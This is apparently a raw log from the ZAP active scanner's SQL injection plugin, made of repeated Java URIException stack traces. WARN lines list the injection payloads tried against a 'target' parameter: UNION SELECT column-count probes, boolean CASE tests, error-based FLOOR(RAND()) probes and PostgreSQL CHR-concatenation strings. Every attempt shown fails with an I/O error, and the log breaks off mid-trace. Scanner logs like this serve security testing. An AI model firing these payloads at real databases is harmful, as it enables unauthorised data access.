org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685696 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685698 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685699 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685700 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685702 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685704 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685705 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685706 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685708 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685710 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685710 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9685864 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9685941 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (5737=1923) THEN 5737 ELSE 5737*(SELECT 5737 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685942 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (1474=1474) THEN 1474 ELSE 1474*(SELECT 1474 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685944 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (5737=1923) THEN 5737 ELSE 5737*(SELECT 5737 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9686010 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 3948 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3948=3948,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9686011 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(7320=7320,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9686012 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1941=1941) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown 